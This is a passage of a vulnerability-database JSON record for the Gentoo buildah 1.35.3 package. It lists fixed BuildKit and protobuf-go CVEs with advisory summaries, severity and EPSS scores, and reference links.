{"url":"http://public2.vulnerablecode.io/api/packages/76464?format=json","purl":"pkg:ebuild/app-containers/buildah@1.35.3","type":"ebuild","namespace":"app-containers","name":"buildah","version":"1.35.3","qualifiers":{},"subpath":"","is_vulnerable":false,"next_non_vulnerable_version":null,"latest_non_vulnerable_version":null,"affected_by_vulnerabilities":[],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/14357?format=json","vulnerability_id":"VCID-9j8p-hqfn-q7bj","summary":"BuildKit vulnerable to possible host system access from mount stub cleaner\n### Impact\nA malicious BuildKit frontend or Dockerfile using `RUN --mount` could trick the feature that removes empty files created for the mountpoints into removing a file outside the container, from the host system.\n\n### Patches\nThe issue has been fixed in v0.12.5\n\n### Workarounds\nAvoid using BuildKit frontend from an untrusted source or building an untrusted Dockerfile containing `RUN --mount` feature.\n\n### References","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-23652.json","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-23652.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-23652","reference_id":"","reference_type":"","scores":[{"value":"0.05701","scoring_system":"epss","scoring_elements":"0.90506","published_at":"2026-05-15T12:55:00Z"},{"value":"0.05701","scoring_system":"epss","scoring_elements":"0.90378","published_at":"2026-04-02T12:55:00Z"},{"value":"0.05701","scoring_system":"epss","scoring_elements":"0.9039","published_at":"2026-04-04T12:55:00Z"},{"value":"0.05701","scoring_system":"epss","scoring_elements":"0.90394","published_at":"2026-04-07T12:55:00Z"},{"value":"0.05701","scoring_system":"epss","scoring_elements":"0.90408","published_at":"2026-04-08T12:55:00Z"},{"value":"0.05701","scoring_system":"epss","scoring_elements":"0.90415","published_at":"2026-04-13T12:55:00Z"},{"value":"0.05701","scoring_system":"epss","scoring_elements":"0.90423","published_at":"2026-04-11T12:55:00Z"},{"value":"0.05701","scoring_system":"epss","scoring_elements":"0.90422","published_at":"2026-04-12T12:55:00Z"},{"value":"0.05701","scoring_system":"epss","scoring_elements":"0.9043","published_at":"2026-04-18T12:55:00Z"},{"value":"0.05701","scoring_system":"epss","scoring_elements":"0.90428","published_at":"2026-04-21T12:55:00Z"},{"value":"0.05701","scoring_system":"epss","scoring_elements":"0.90441","published_at":"2026-04-26T12:55:00Z"},{"value":"0.05701","scoring_system":"epss","scoring_elements":"0.90437","published_at":"2026-04-29T12:55:00Z"},{"value":"0.05701","scoring_system":"epss","scoring_elements":"0.90449","published_at":"2026-05-05T12:55:00Z"},{"value":"0.05701","scoring_system":"epss","scoring_elements":"0.90466","published_at":"2026-05-07T12:55:00Z"},{"value":"0.05701","scoring_system":"epss","scoring_elements":"0.90479","published_at":"2026-05-09T12:55:00Z"},{"value":"0.05701","scoring_system":"epss","scoring_elements":"0.90476","published_at":"2026-05-11T12:55:00Z"},{"value":"0.05701","scoring_system":"epss","scoring_elements":"0.90485","published_at":"2026-05-12T12:55:00Z"},{"value":"0.05701","scoring_system":"epss","scoring_elements":"0.90498","published_at":"2026-05-14T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-23652"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"6.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/moby/buildkit","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/moby/buildkit"},{"reference_url":"https://github.com/moby/buildkit/pull/4603","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-02-01T16:13:41Z/"}],"url":"https://github.com/moby/buildkit/pull/4603"},{"reference_url":"https://github.com/moby/buildkit/releases/tag/v0.12.5","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-02-01T16:13:41Z/"}],"url":"https://github.com/moby/buildkit/releases/tag/v0.12.5"},{"reference_url":"https://github.com/moby/buildkit/security/advisories/GHSA-4v98-7qmw-rqr8","reference_id":"","reference_type":"","scores":[{"value":"10","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H"},{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-02-01T16:13:41Z/"}],"url":"https://github.com/moby/buildkit/security/advisories/GHSA-4v98-7qmw-rqr8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-23652","reference_id":"","reference_type":"","scores":[{"value":"10.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-23652"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2262225","reference_id":"2262225","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2262225"},{"reference_url":"https://security.gentoo.org/glsa/202407-12","reference_id":"GLSA-202407-12","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202407-12"},{"reference_url":"https://security.gentoo.org/glsa/202407-25","reference_id":"GLSA-202407-25","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202407-25"},{"reference_url":"https://security.gentoo.org/glsa/202409-29","reference_id":"GLSA-202409-29","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202409-29"},{"reference_url":"https://usn.ubuntu.com/7474-1/","reference_id":"USN-7474-1","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/7474-1/"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/76464?format=json","purl":"pkg:ebuild/app-containers/buildah@1.35.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:ebuild/app-containers/buildah@1.35.3"}],"aliases":["CVE-2024-23652","GHSA-4v98-7qmw-rqr8"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9j8p-hqfn-q7bj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/14344?format=json","vulnerability_id":"VCID-ba18-6srf-ufbu","summary":"BuildKit vulnerable to possible race condition with accessing subpaths from cache mounts\n### Impact\nTwo malicious build steps running in parallel sharing the same cache mounts with subpaths could cause a race condition that can lead to files from the host system being accessible to the build container.\n\n### Patches\nThe issue has been fixed in v0.12.5\n\n### Workarounds\nAvoid using BuildKit frontend from an untrusted source or building an untrusted Dockerfile containing cache mounts with `--mount=type=cache,source=...` options.\n\n### References\nhttps://www.openwall.com/lists/oss-security/2019/05/28/1","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-23651.json","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-23651.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-23651","reference_id":"","reference_type":"","scores":[{"value":"0.00548","scoring_system":"epss","scoring_elements":"0.68103","published_at":"2026-05-15T12:55:00Z"},{"value":"0.00548","scoring_system":"epss","scoring_elements":"0.67853","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00548","scoring_system":"epss","scoring_elements":"0.67872","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00548","scoring_system":"epss","scoring_elements":"0.67903","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00548","scoring_system":"epss","scoring_elements":"0.67917","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00548","scoring_system":"epss","scoring_elements":"0.67941","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00548","scoring_system":"epss","scoring_elements":"0.67927","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00548","scoring_system":"epss","scoring_elements":"0.67891","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00548","scoring_system":"epss","scoring_elements":"0.67929","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00548","scoring_system":"epss","scoring_elements":"0.67942","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00548","scoring_system":"epss","scoring_elements":"0.67923","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00548","scoring_system":"epss","scoring_elements":"0.67967","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00548","scoring_system":"epss","scoring_elements":"0.6804","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00548","scoring_system":"epss","scoring_elements":"0.68008","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00548","scoring_system":"epss","scoring_elements":"0.68033","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00548","scoring_system":"epss","scoring_elements":"0.6809","published_at":"2026-05-14T12:55:00Z"},{"value":"0.00563","scoring_system":"epss","scoring_elements":"0.68456","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00563","scoring_system":"epss","scoring_elements":"0.68434","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00563","scoring_system":"epss","scoring_elements":"0.68476","published_at":"2026-05-07T12:55:00Z"},{"value":"0.00563","scoring_system":"epss","scoring_elements":"0.68451","published_at":"2026-04-26T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-23651"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/moby/buildkit","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/moby/buildkit"},{"reference_url":"https://github.com/moby/buildkit/pull/4604","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-05-08T15:46:26Z/"}],"url":"https://github.com/moby/buildkit/pull/4604"},{"reference_url":"https://github.com/moby/buildkit/releases/tag/v0.12.5","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-05-08T15:46:26Z/"}],"url":"https://github.com/moby/buildkit/releases/tag/v0.12.5"},{"reference_url":"https://github.com/moby/buildkit/security/advisories/GHSA-m3r6-h7wv-7xxv","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-05-08T15:46:26Z/"}],"url":"https://github.com/moby/buildkit/security/advisories/GHSA-m3r6-h7wv-7xxv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-23651","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-23651"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2262224","reference_id":"2262224","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2262224"},{"reference_url":"https://security.gentoo.org/glsa/202407-12","reference_id":"GLSA-202407-12","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202407-12"},{"reference_url":"https://security.gentoo.org/glsa/202407-25","reference_id":"GLSA-202407-25","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202407-25"},{"reference_url":"https://security.gentoo.org/glsa/202409-29","reference_id":"GLSA-202409-29","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202409-29"},{"reference_url":"https://usn.ubuntu.com/7474-1/","reference_id":"USN-7474-1","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/7474-1/"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/76464?format=json","purl":"pkg:ebuild/app-containers/buildah@1.35.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:ebuild/app-containers/buildah@1.35.3"}],"aliases":["CVE-2024-23651","GHSA-m3r6-h7wv-7xxv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ba18-6srf-ufbu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/14163?format=json","vulnerability_id":"VCID-dmsf-7cxm-xff5","summary":"Buildkit's interactive containers API does not validate entitlements check\n### Impact\nIn addition to running containers as build steps, BuildKit also provides APIs for running interactive containers based on built images. It was possible to use these APIs to ask BuildKit to run a container with elevated privileges. Normally, running such containers is only allowed if special `security.insecure` entitlement is enabled both by buildkitd configuration and allowed by the user initializing the build request.\n\n### Patches\nThe issue has been fixed in v0.12.5 .\n\n### Workarounds\nAvoid using BuildKit frontends from untrusted sources. A frontend image is usually specified as the `#syntax` line on your Dockerfile, or with `--frontend` flag when using `buildctl build` command.\n\n### References","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-23653.json","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-23653.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-23653","reference_id":"","reference_type":"","scores":[{"value":"0.10301","scoring_system":"epss","scoring_elements":"0.93266","published_at":"2026-05-15T12:55:00Z"},{"value":"0.10301","scoring_system":"epss","scoring_elements":"0.93156","published_at":"2026-04-02T12:55:00Z"},{"value":"0.10301","scoring_system":"epss","scoring_elements":"0.9316","published_at":"2026-04-04T12:55:00Z"},{"value":"0.10301","scoring_system":"epss","scoring_elements":"0.93158","published_at":"2026-04-07T12:55:00Z"},{"value":"0.10301","scoring_system":"epss","scoring_elements":"0.93167","published_at":"2026-04-08T12:55:00Z"},{"value":"0.10301","scoring_system":"epss","scoring_elements":"0.93171","published_at":"2026-04-09T12:55:00Z"},{"value":"0.10301","scoring_system":"epss","scoring_elements":"0.93177","published_at":"2026-04-11T12:55:00Z"},{"value":"0.10301","scoring_system":"epss","scoring_elements":"0.93175","published_at":"2026-04-12T12:55:00Z"},{"value":"0.10301","scoring_system":"epss","scoring_elements":"0.93176","published_at":"2026-04-13T12:55:00Z"},{"value":"0.10301","scoring_system":"epss","scoring_elements":"0.93192","published_at":"2026-04-16T12:55:00Z"},{"value":"0.10301","scoring_system":"epss","scoring_elements":"0.93197","published_at":"2026-04-18T12:55:00Z"},{"value":"0.10301","scoring_system":"epss","scoring_elements":"0.93213","published_at":"2026-05-05T12:55:00Z"},{"value":"0.10301","scoring_system":"epss","scoring_elements":"0.93227","published_at":"2026-05-07T12:55:00Z"},{"value":"0.10301","scoring_system":"epss","scoring_elements":"0.93236","published_at":"2026-05-09T12:55:00Z"},{"value":"0.10301","scoring_system":"epss","scoring_elements":"0.93237","published_at":"2026-05-11T12:55:00Z"},{"value":"0.10301","scoring_system":"epss","scoring_elements":"0.93244","published_at":"2026-05-12T12:55:00Z"},{"value":"0.10301","scoring_system":"epss","scoring_elements":"0.9326","published_at":"2026-05-14T12:55:00Z"},{"value":"0.1055","scoring_system":"epss","scoring_elements":"0.93294","published_at":"2026-04-29T12:55:00Z"},{"value":"0.1055","scoring_system":"epss","scoring_elements":"0.93296","published_at":"2026-04-21T12:55:00Z"},{"value":"0.1055","scoring_system":"epss","scoring_elements":"0.93302","published_at":"2026-04-24T12:55:00Z"},{"value":"0.1055","scoring_system":"epss","scoring_elements":"0.93299","published_at":"2026-04-26T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-23653"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/moby/buildkit","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/moby/buildkit"},{"reference_url":"https://github.com/moby/buildkit/commit/5026d95aa3336e97cfe46e3764f52d08bac7a10e","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/moby/buildkit/commit/5026d95aa3336e97cfe46e3764f52d08bac7a10e"},{"reference_url":"https://github.com/moby/buildkit/commit/92cc595cfb12891d4b3ae476e067c74250e4b71e","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/moby/buildkit/commit/92cc595cfb12891d4b3ae476e067c74250e4b71e"},{"reference_url":"https://github.com/moby/buildkit/pull/4602","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-08-23T18:03:21Z/"}],"url":"https://github.com/moby/buildkit/pull/4602"},{"reference_url":"https://github.com/moby/buildkit/releases/tag/v0.12.5","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-08-23T18:03:21Z/"}],"url":"https://github.com/moby/buildkit/releases/tag/v0.12.5"},{"reference_url":"https://github.com/moby/buildkit/security/advisories/GHSA-wr6v-9f75-vh2g","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-08-23T18:03:21Z/"}],"url":"https://github.com/moby/buildkit/security/advisories/GHSA-wr6v-9f75-vh2g"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-23653","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-23653"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2262226","reference_id":"2262226","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2262226"},{"reference_url":"https://security.gentoo.org/glsa/202407-12","reference_id":"GLSA-202407-12","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202407-12"},{"reference_url":"https://security.gentoo.org/glsa/202407-25","reference_id":"GLSA-202407-25","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202407-25"},{"reference_url":"https://security.gentoo.org/glsa/202409-29","reference_id":"GLSA-202409-29","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202409-29"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/76464?format=json","purl":"pkg:ebuild/app-containers/buildah@1.35.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:ebuild/app-containers/buildah@1.35.3"}],"aliases":["CVE-2024-23653","GHSA-wr6v-9f75-vh2g"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dmsf-7cxm-xff5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/16464?format=json","vulnerability_id":"VCID-f8ak-21d8-juff","summary":"Golang protojson.Unmarshal function infinite loop when unmarshaling certain forms of invalid JSON\nThe protojson.Unmarshal function can enter an infinite loop when unmarshaling certain forms of invalid JSON. This condition can occur when unmarshaling into a message which contains a google.protobuf.Any value, or when the UnmarshalOptions.DiscardUnknown option is set.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-24786.json","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-24786.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-24786","reference_id":"","reference_type":"","scores":[{"value":"0.00313","scoring_system":"epss","scoring_elements":"0.54531","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00313","scoring_system":"epss","scoring_elements":"0.5449","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00313","scoring_system":"epss","scoring_elements":"0.54517","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00313","scoring_system":"epss","scoring_elements":"0.54529","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00313","scoring_system":"epss","scoring_elements":"0.54511","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00313","scoring_system":"epss","scoring_elements":"0.54528","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00313","scoring_system":"epss","scoring_elements":"0.54523","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00322","scoring_system":"epss","scoring_elements":"0.55289","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00322","scoring_system":"epss","scoring_elements":"0.5527","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00322","scoring_system":"epss","scoring_elements":"0.55266","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00393","scoring_system":"epss","scoring_elements":"0.60287","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00404","scoring_system":"epss","scoring_elements":"0.60975","published_at":"2026-05-07T12:55:00Z"},{"value":"0.00404","scoring_system":"epss","scoring_elements":"0.61094","published_at":"2026-05-15T12:55:00Z"},{"value":"0.00404","scoring_system":"epss","scoring_elements":"0.6108","published_at":"2026-05-14T12:55:00Z"},{"value":"0.00404","scoring_system":"epss","scoring_elements":"0.61023","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00404","scoring_system":"epss","scoring_elements":"0.60997","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00404","scoring_system":"epss","scoring_elements":"0.61034","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00404","scoring_system":"epss","scoring_elements":"0.60926","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00404","scoring_system":"epss","scoring_elements":"0.60978","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00404","scoring_system":"epss","scoring_elements":"0.60985","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00404","scoring_system":"epss","scoring_elements":"0.60974","published_at":"2026-04-24T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-24786"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24786","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24786"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/protocolbuffers/protobuf-go","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/protocolbuffers/protobuf-go"},{"reference_url":"https://github.com/protocolbuffers/protobuf-go/commit/f01a588e5810b90996452eec4a28f22a0afae023","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/protocolbuffers/protobuf-go/commit/f01a588e5810b90996452eec4a28f22a0afae023"},{"reference_url":"https://github.com/protocolbuffers/protobuf-go/releases/tag/v1.33.0","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/protocolbuffers/protobuf-go/releases/tag/v1.33.0"},{"reference_url":"https://go.dev/cl/569356","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","s